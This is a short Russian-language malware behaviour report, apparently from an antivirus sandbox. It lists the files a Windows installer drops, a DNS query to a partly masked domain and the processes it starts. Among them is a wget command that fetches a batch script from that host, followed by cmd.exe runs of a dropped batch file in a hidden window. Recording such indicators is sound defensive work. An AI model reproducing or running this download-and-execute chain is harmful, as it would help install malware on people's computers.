Техническая информация
- %WINDIR%\a.bat
- %WINDIR%\wget\bin\libeay32.dll
- %WINDIR%\wget\bin\libiconv2.dll
- %WINDIR%\wget\bin\libintl3.dll
- %WINDIR%\wget\bin\libssl32.dll
- %WINDIR%\wget\bin\wget.exe
- %WINDIR%\curl\curl.exe
- %WINDIR%\set-up.exe
- %TEMP%\is-rmet1.tmp\set-up.tmp
- %TEMP%\is-9761l.tmp\_isetup\_setup64.tmp
- DNS ASK 88##.space
- '%WINDIR%\set-up.exe'
- '%WINDIR%\wget\bin\wget.exe' -c -P "%WINDIR%" "http://88##.space/rs/dy/p2/b4a/b.bat" --referer="alpha"
- '%TEMP%\is-rmet1.tmp\set-up.tmp' /SL5="$20268,14621765,730624,%WINDIR%\Set-up.exe"
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\a.bat" "' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\a.bat" "
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" ver "
- '%WINDIR%\syswow64\findstr.exe' /IL "5.1."